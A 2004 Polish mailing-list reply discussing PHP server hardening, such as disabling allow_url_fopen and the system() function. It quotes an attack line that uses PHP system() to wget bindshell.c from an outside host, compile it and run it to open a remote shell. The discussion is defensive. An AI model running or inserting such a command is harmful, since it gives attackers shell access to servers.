Witam, Dnia Wed, Feb 18, 2004 at 03:27:43PM CET, Adam Byrtek / alpha napisał: > On Wed, Feb 18, 2004 at 12:45:05PM +0100, Tomasz T. Ciaszczyk wrote: > > system("cd tmp;wget http://www.rootshell.com/bindshell.c;gcc bindshell.c;./a.out"); > ... > > - zablokowanie fopena na zewnatrz w php (allow_url_fopen = Off) > > To dobry pomysl, ale nie chroni przed tym, o czym sam wspomniales, > czyli uzyciem system(), jesli taka mozliwosc istnieje. od tego jest dokument "security" na php.net ;> (m.in. wylacza sie wogole system). Pozdrawiam, Tomasz T. Ciaszczyk -- .: ciacho<at>ciacho.pl ciacho<at>jabber.org http://ciacho.pl :. .: a real life to po prostu jeden z możliwych shellów. :. .: Ten najgorszy. :. .: -- Carramba in "CyberJoly Drim" :.
Attachment:
pgpOVyCuN_WLq.pgp
Description: PGP signature